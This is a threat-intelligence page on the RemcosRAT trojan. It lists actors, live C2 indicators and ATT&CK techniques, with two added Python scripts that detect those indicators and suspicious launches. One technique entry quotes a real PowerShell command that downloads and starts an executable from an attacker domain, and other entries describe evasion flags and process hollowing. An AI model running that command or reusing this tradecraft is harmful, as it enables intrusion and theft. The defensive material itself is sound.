Mallory
Tags: Malware, Ransomware. Used by 7 actors.

RemcosRAT

RemcosRAT is a full-featured remote access trojan used across a wide range of criminal and espionage-linked campaigns. The content directly describes capabilities including remote command execution, file management, process control, keylogging, screenshot capture, webcam and microphone surveillance, clipboard monitoring, and theft of data from browsers and applications. Reported configurations include storage of keylogs in logs.dat, screenshot capture at 10-second intervals, audio recording in 5-second clips, and use of registry-based persistence such as HKCU\Software\Remcos or startup keys. Multiple reports describe RemcosRAT being process-hollowed or injected into legitimate Microsoft binaries including Aspnet_compiler.exe and Msbuild.exe, and one campaign used vulnerable drivers for kernel-level privilege escalation before deploying the final payload.

Observed delivery vectors in the content include HTA droppers executed via mshta.exe, obfuscated JavaScript attachments, PowerShell stages, AutoIt scripts, DLL sideloading with signed VMware and Microsoft Edge binaries, LNK-based chains, malicious SVG-linked archives, trojanized VeraCrypt installers, illegal gambling-related tools, and phishing lures themed as purchase inquiries, court summonses, enforcement notices, combat videos, and romance or acquaintance outreach. Public hosting and staging services mentioned in related campaigns include GitHub, Google Drive, OneDrive, Bitbucket, Dropbox, Discord CDN, YDRAY, Paste.ee, archive.org, pastefy.app, and pastes.io.

The malware is associated in the content with numerous threat actors and distribution ecosystems. CERT-UA reported UAC-0184 using RemcosRAT against representatives of Ukraine’s Defense Forces to steal documents and messenger data. UAC-0050 / DaVinci Group has previously used RemcosRAT in attacks targeting Ukraine. Konni-related activity targeting South Korean users and North Korean defectors included RemcosRAT alongside other RATs. Red Akodon used RemcosRAT in phishing campaigns impersonating Colombian judicial and government entities. Acronis TRU’s Shadow Vector campaign in Colombia delivered RemcosRAT via DLL side-loading and vulnerable drivers. Breakglass Intelligence documented RemcosRAT delivered by GoLoader and by the Amadey pay-per-install campaign tagged fbf543. Additional reporting linked RemcosRAT activity to attacks on Russian organizations, attacks targeting Ukraine, and campaigns against South Korean users.

Targeting described in the content spans defense and military personnel in Ukraine, government, healthcare, technology, and manufacturing sectors worldwide, Colombian users and organizations, South Korean users, cryptocurrency users in broader malware ecosystems, and Russian organizations. Infrastructure and indicators explicitly mentioned for RemcosRAT campaigns include the-new-age.co.ua:443, biches-yeah.co.ua:443, 178.33.57.149:443, 178.33.57.159:8899, 88.151.192.14:443, 216.250.249.222 on ports 80 and 443, goodpeopleswhitbrigheartwinthisindustryi.duckdns.org:14646, mutexes Rmc-E3G25N and Rmc-3UG3BG, install name remcos.exe, and license hash 72214B9FB81C38C5D9F33A771B74F635. Related staging infrastructure in one 2026 campaign included 96.44.159.218 and multiple Remcos listeners on 96.44.159.137, 96.44.159.225, 96.44.159.222, 96.44.159.151, 96.44.159.165, and 96.44.159.154, with default Remcos TLS certificates noted. Specific sample references in the content include remcos.exe communicating with the-new-age.co.ua:443 and multiple 2026 samples clustered by shared imphash and configuration artifacts.
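The indicators quoted above (C2 hosts and ports, the 2026 staging and listener IPs, the two mutex names, the install name and the registry persistence key) are the kind a defender sweeps telemetry for. The script below is an added example, not code from the page or from Mallory: it loads exactly those indicators and matches them against a handful of constructed telemetry records. The record layout (dicts with `type`, `query`, `dst`, `dport`, `image`, `name`, `key` fields) and the sample records are assumptions standing in for an EDR or NDR export.

```python
"""Match the RemcosRAT indicators quoted on this page against simple host and
network telemetry records.

Added example, not code from the page or from Mallory.  The record layout
(dicts with type/query/dst/dport/image/name/key fields) and the sample
records are constructed; replace them with your own EDR/NDR export.
"""
import ntpath

# Network indicators named on the page, with the port where one is given.
C2_DOMAINS = {
    "the-new-age.co.ua": {443},
    "biches-yeah.co.ua": {443},
    "goodpeopleswhitbrigheartwinthisindustryi.duckdns.org": {14646},
}
C2_IPS = {
    "178.33.57.149": {443},
    "178.33.57.159": {8899},
    "88.151.192.14": {443},
    "216.250.249.222": {80, 443},
}
# Staging host and Remcos listeners from the 2026 campaign; the page gives no ports.
STAGING_IPS = {
    "96.44.159.218", "96.44.159.137", "96.44.159.225", "96.44.159.222",
    "96.44.159.151", "96.44.159.165", "96.44.159.154",
}
# Host indicators named on the page.
MUTEXES = {"Rmc-E3G25N", "Rmc-3UG3BG"}
PERSISTENCE_KEY = r"HKCU\Software\Remcos"
INSTALL_NAME = "remcos.exe"


def match_event(event: dict) -> list[str]:
    """Return the reasons this record matches, or [] if it does not."""
    kind = event.get("type")
    hits = []
    if kind == "dns":
        # Normalise case and a trailing dot before comparing with the indicator list.
        name = event["query"].lower().rstrip(".")
        if name in C2_DOMAINS:
            hits.append(f"c2 domain {name}")
    elif kind == "flow":
        dst, dport = event["dst"], event.get("dport")
        if dst in C2_IPS:
            # The IP itself is the indicator; an unlisted port is still worth a look.
            note = "" if dport in C2_IPS[dst] else " (unlisted port)"
            hits.append(f"c2 ip {dst}:{dport}{note}")
        elif dst in STAGING_IPS:
            hits.append(f"staging/listener ip {dst}")
    elif kind == "process":
        # ntpath handles Windows paths even when this runs on a non-Windows host.
        if ntpath.basename(event["image"]).lower() == INSTALL_NAME:
            hits.append(f"install name {INSTALL_NAME}")
    elif kind == "mutex":
        if event["name"] in MUTEXES:
            hits.append(f"mutex {event['name']}")
    elif kind == "registry":
        # Match the key and anything beneath it (values such as exepath).
        if event["key"].lower().startswith(PERSISTENCE_KEY.lower()):
            hits.append(f"persistence key {PERSISTENCE_KEY}")
    return hits


def scan(events: list[dict]) -> list[tuple[int, str]]:
    """Scan a batch of records and return (index, reason) pairs for every hit."""
    return [(i, reason) for i, ev in enumerate(events) for reason in match_event(ev)]


# Constructed telemetry: the first seven records should match, the last two not.
SAMPLE_EVENTS = [
    {"type": "dns", "query": "THE-NEW-AGE.CO.UA."},
    {"type": "flow", "dst": "216.250.249.222", "dport": 443},
    {"type": "flow", "dst": "216.250.249.222", "dport": 8080},
    {"type": "flow", "dst": "96.44.159.151", "dport": 2404},
    {"type": "process", "image": r"C:\Users\alice\AppData\Roaming\Remcos.EXE"},
    {"type": "mutex", "name": "Rmc-3UG3BG"},
    {"type": "registry", "key": r"HKCU\Software\Remcos\exepath"},
    {"type": "flow", "dst": "8.8.8.8", "dport": 53},
    {"type": "dns", "query": "example.org"},
]

if __name__ == "__main__":
    for idx, reason in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {reason}")
```

Exact-match indicators age quickly (the page itself notes several 2026 listeners with default Remcos TLS certificates), so a sweep like this is a starting point for a hunt, not a substitute for the behavioural detections that follow from the technique list further down.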

For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

THREAT ACTORS

Groups observed using it

7 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

UAC-0184

remcos.exe (RemcosRAT; idelural; the-new-age.co.ua:443)

via CERT-UA (cert.gov.ua)

Kimsuky

“These installers executed AutoIt scripts… that deployed multiple RATs (RemcosRAT, QuasarRAT, and RftRAT)…”

via Security Affairs (securityaffairs.com)

APT37

The files distributed were malicious AutoIt scripts and modules that enable remote access and keylogging, as well as various RATs, including LilithRAT and RemcosRAT.

via Dark Reading (darkreading.com)

Red Akodon

Red Akodon targets users... using remote access trojans (RAT) like RemcosRAT, QuasarRAT, AsyncRAT, and XWorm.

via SCILabs blog (blog.scilabs.mx)

UAC-0050

"...and remote access trojans such as RemcosRAT in attacks targeting Ukraine."

via The Hacker News (thehackernews.com)

PseudoSticky

"...to attack Russian organizations... with malware like RemcosRAT and DarkTrack RAT..."

via The Hacker News (thehackernews.com)
MITRE ATT&CK

Techniques & procedures

35 distinct techniques documented for this family, organized by ATT&CK tactic.

Resource Development (1 technique)

T1583.003 Virtual Private Server (evidence: 1)

MITRE ATT&CK T1583.003 — Virtual Private Server (PFCLOUD, ThinkHuge, OMEGATECH)

Initial Access (2 techniques)

T1566.001 Spearphishing Attachment (evidence: 4)

Tactic: Initial Access | Technique: Phishing: Spearphishing Attachment (T1566.001) | Implementation: Email with "Bank slip.exe", "Payment Advice.exe"

T1566.003 Spearphishing via Service (evidence: 1)

"the main channel for delivering the malware is popular messengers, and the initial intrusion methods involve elements of social engineering" (translated from Ukrainian)

Execution (7 techniques)

T1047 Windows Management Instrumentation (evidence: 1)

Tactic: Execution | Technique: Windows Management Instrumentation (T1047) | Implementation: Win32_Process.Create() hidden window launch

T1059.001 PowerShell (evidence: 2)

The PowerShell runs with the standard evasion flags: -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden.

T1059.005 Visual Basic (evidence: 1)

Tactic: Execution | Technique: VBScript (T1059.005) | Implementation: HTA VBScript execution in mshta.exe

T1059.007 JavaScript (evidence: 2)

Tactic: Execution | Technique: JavaScript (T1059.007) | Implementation: WScript execution of obfuscated JS dropper

T1059.010 AutoHotKey & AutoIT (evidence: 1)

Tactic: Execution | Technique: Command and Scripting: AutoIt (T1059.010) | Implementation: AutoIt-compiled loader with WRSJLIM cipher

T1129 Shared Modules (evidence: 1)

Tactic: Execution | Technique: Shared Modules (T1129) | Implementation: .NET Assembly.Load() for DEV.dll reflective loading

T1204.002 Malicious File (evidence: 3)

"during which the latter is sent a file (an archive) with a request to help open or process it" (translated from Ukrainian)

Persistence (1 technique)

T1547.001 Registry Run Keys / Startup Folder (evidence: 3)

%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Patchhelp_beta.lnk ... Streamsvc.lnk ... appBg.lnk

Privilege Escalation (4 techniques)

T1055 Process Injection (evidence: 1)

Tactic: Defense Evasion | Technique: Process Injection (T1055) | Implementation: VirtualAlloc RWX + DllCallAddress shellcode execution

T1055.012 Process Hollowing (evidence: 2)

Tactic: Defense Evasion | Technique: Process Hollowing (T1055.012) | Implementation: Aspnet_compiler.exe hollowed via NT API

T1547.001 Registry Run Keys / Startup Folder (evidence: 3)

%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Patchhelp_beta.lnk ... Streamsvc.lnk ... appBg.lnk

T1548.002 Bypass User Account Control (evidence: 1)

Tactic: Privilege Escalation | Technique: Bypass UAC (T1548.002) | Implementation: Registry: EnableLUA = 0 modification

Stealth (8 techniques)

T1027 Obfuscated Files or Information (evidence: 4)

Tactic: Defense Evasion | Technique: Obfuscated Files or Information (T1027) | Implementation: Whitespace padding, random case, base64, delimiter-based concatenation

T1036 Masquerading (evidence: 1)

Tactic: Defense Evasion | Technique: Masquerading (T1036) | Implementation: Abuse of Msbuild.exe as LOLBin host

T1036.001 Invalid Code Signature (evidence: 1)

Tactic: Defense Evasion | Technique: Masquerading: Invalid Code Signature (T1036.001) | Implementation: Stolen/abused code signing certs

T1055 Process Injection (evidence: 1)

Tactic: Defense Evasion | Technique: Process Injection (T1055) | Implementation: VirtualAlloc RWX + DllCallAddress shellcode execution

T1055.012 Process Hollowing (evidence: 2)

Tactic: Defense Evasion | Technique: Process Hollowing (T1055.012) | Implementation: Aspnet_compiler.exe hollowed via NT API

T1140 Deobfuscate/Decode Files or Information (evidence: 1)

Tactic: Defense Evasion | Technique: Deobfuscate/Decode Files (T1140) | Implementation: Base64, UTF-16LE, delimiter stripping

T1497 Virtualization/Sandbox Evasion (evidence: 1)

Tactic: Defense Evasion | Technique: Virtualization/Sandbox Evasion (T1497) | Implementation: 3-second sleep timer

T1620 Reflective Code Loading (evidence: 1)

Technique: Reflective Code Loading (T1620) | Usage: Go-based reflective PE loader (both v1 and v2)

Credential Access (2 techniques)

T1056.001 Keylogging (evidence: 1)

Tactic: Credential Access | Technique: Keylogging (T1056.001) | Implementation: Continuous keylogging to logs.dat

T1555 Credentials from Password Stores (evidence: 1)

Tactic: Credential Access | Technique: Credentials from Password Stores (T1555) | Implementation: Outlook credential theft via Nirsoft tools

Discovery (1 technique)

T1497 Virtualization/Sandbox Evasion (evidence: 1)

Tactic: Defense Evasion | Technique: Virtualization/Sandbox Evasion (T1497) | Implementation: 3-second sleep timer

Collection (5 techniques)

T1056.001 Keylogging (evidence: 1)

Tactic: Credential Access | Technique: Keylogging (T1056.001) | Implementation: Continuous keylogging to logs.dat

T1113 Screen Capture (evidence: 2)

Tactic: Collection | Technique: Screen Capture (T1113) | Implementation: Periodic screenshots to Screenshots/ directory

T1114 Email Collection (evidence: 1)

Tactic: Collection | Technique: Email Collection (T1114) | Implementation: Outlook account access

T1123 Audio Capture (evidence: 2)

Tactic: Collection | Technique: Audio Capture (T1123) | Implementation: 5-second audio recording clips

T1125 Video Capture (evidence: 1)

Tactic: Collection | Technique: Video Capture (T1125) | Implementation: Camera access via OpenCamera/CloseCamera

Command and Control (8 techniques)

T1071 Application Layer Protocol (evidence: 1)

Tactic: Command and Control | Technique: Application Layer Protocol (T1071) | Implementation: TLS-encrypted C2 on port 14646

T1095 Non-Application Layer Protocol (evidence: 1)

The RAT -- compiled February 3, 2026 -- phones home to a dedicated C2 at 216.250.249.222 on ports 80 and 443 using Remcos proprietary protocol (not HTTP, not TLS -- raw TCP masquerading on web ports).

T1102 Web Service (evidence: 1)

Tactic: Command and Control | Technique: Web Service (T1102) | Implementation: Paste services (pastefy.app, pastes.io) for payload hosting

T1105 Ingress Tool Transfer (evidence: 1)

-uri http://yeah-biches.kyiv.ua/securitycheck.exe -OutFile securitycheck.exe; start securitycheck.exe

T1219 Remote Access Tools (evidence: 1)

REMCOSRAT ... XWORM

T1568.002 Domain Generation Algorithms (evidence: 1)

Tactic: Command and Control | Technique: Dynamic Resolution (T1568.002) | Implementation: DuckDNS for C2 domain resolution

T1571 Non-Standard Port (evidence: 1)

Tactic: Command and Control | Technique: Non-Standard Port (T1571) | Implementation: Remcos protocol on ports 80/443 (not HTTP/TLS)

T1573 Encrypted Channel (evidence: 1)

Tactic: Command and Control | Technique: Encrypted Channel (T1573) | Implementation: Optional TLS mode available in configuration

Exfiltration (1 technique)

T1041 Exfiltration Over C2 Channel (evidence: 1)

"SIGTOP and TUSC are used to steal and upload data from the computer" (translated from Ukrainian)
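Several of the Execution and Stealth entries above describe behaviour that is visible in process-creation telemetry: PowerShell started with -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (T1059.001), HTA content run through mshta.exe (T1059.005), an obfuscated JavaScript dropper run by WScript (T1059.007), and Aspnet_compiler.exe or Msbuild.exe used as a hollowing or LOLBin host (T1055.012, T1036). The rules below are an added example, not code from the page or from Mallory; they turn those entries into checks over constructed process events. The event fields (`image`, `cmdline`, `parent`), the sample events and the allow-list of parents from which the .NET build binaries are expected are assumptions to tune for your own estate, not something the page states.

```python
"""Flag process-creation events matching the RemcosRAT execution and evasion
techniques listed on this page (T1059.001, T1059.005, T1059.007, T1055.012).

Added example, not code from the page or from Mallory.  Event fields
(image, cmdline, parent), the sample events and BUILD_PARENTS are constructed
or assumed; tune them to your own telemetry and estate.
"""
import ntpath
import re

# PowerShell accepts any unambiguous prefix of a parameter name, so the
# abbreviated forms (-ep, -nop, -w) must count alongside the full spellings
# the page quotes.
PS_FLAGS = [
    re.compile(r"-e(x\w*|p)\s+bypass", re.I),  # -ExecutionPolicy Bypass / -ep Bypass
    re.compile(r"-nop\w*", re.I),              # -NoProfile / -nop
    re.compile(r"-w\w*\s+hidden", re.I),       # -WindowStyle Hidden / -w hidden
]
# Legitimate .NET binaries the page reports being hollowed or abused as hosts.
HOLLOWING_HOSTS = {"aspnet_compiler.exe", "msbuild.exe"}
# Parents from which those binaries are expected on a developer box (assumption).
BUILD_PARENTS = {"devenv.exe", "msbuild.exe", "dotnet.exe", "vbcscompiler.exe"}


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path, usable on any host."""
    return ntpath.basename(path).lower()


def detect(event: dict) -> list[str]:
    """Return the ATT&CK technique IDs whose rules this event triggers."""
    image = _base(event["image"])
    cmd = event.get("cmdline", "")
    parent = _base(event.get("parent", ""))
    parts = cmd.split(None, 1)
    args = parts[1] if len(parts) > 1 else ""   # command line minus the image
    ids = []

    if image in {"powershell.exe", "pwsh.exe"}:
        # Two of the three flags together is already unusual outside automation.
        if sum(1 for rx in PS_FLAGS if rx.search(cmd)) >= 2:
            ids.append("T1059.001")

    if image == "mshta.exe" and args:
        # mshta.exe with no argument only shows a dialog; any argument runs content.
        ids.append("T1059.005")

    if image in {"wscript.exe", "cscript.exe"} and re.search(r"\.jse?\b", args, re.I):
        ids.append("T1059.007")

    if image in HOLLOWING_HOSTS and parent not in BUILD_PARENTS:
        # A hollowed Aspnet_compiler.exe is spawned by the loader, not a build chain.
        ids.append("T1055.012")

    return ids


def triage(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Return (index, technique_ids) for each event that triggered a rule."""
    return [(i, ids) for i, ev in enumerate(events) if (ids := detect(ev))]


# Constructed events: the first four should fire, the last two should not.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File C:\Users\Public\stage.ps1",
     "parent": r"C:\Windows\System32\wscript.exe"},
    {"image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Users\Public\invoice.hta",
     "parent": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\alice\Downloads\Purchase Order.js"',
     "parent": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe",
     "cmdline": "aspnet_compiler.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"image": r"C:\Program Files\Microsoft Visual Studio\2022\MSBuild\Current\Bin\MSBuild.exe",
     "cmdline": "MSBuild.exe App.csproj",
     "parent": r"C:\Program Files\Microsoft Visual Studio\2022\Common7\IDE\devenv.exe"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Date",
     "parent": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for idx, ids in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(ids)}")
```

The Aspnet_compiler.exe rule is the one most worth tuning: on build servers the allow-list of parents must be widened, and a stronger signal is the combination the page describes, the binary being hollowed and then making the network connections listed under Command and Control.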

INDICATORS OF COMPROMISE

IOCs tracked for this family

84 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

Network: 28 tracked. IPs, domains, and DNS infrastructure linked to this family.

Hashes: 44 tracked. File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Other: 12 tracked. Other indicator types observed in public reporting.

Type | Value | Latest sighting
domain | (redacted; view in app) | 3 months ago
hash.sha256 | (redacted; view in app) | 4 months ago
uri | (redacted; view in app) | 4 months ago
ip.v4 | (redacted; view in app) | 4 months ago
domain | (redacted; view in app) | 4 months ago
domain | (redacted; view in app) | 4 months ago
ACTIVITY FEED

Recent activity

23 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
IOC matching (84): Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution (7): Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities: CVEs this family uses for access and lateral movement.

Detection signatures: YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping (35): Every documented technique, ranked by evidence weight.

Researcher chatter: Reddit, Mastodon, and CTI community discussion around this family.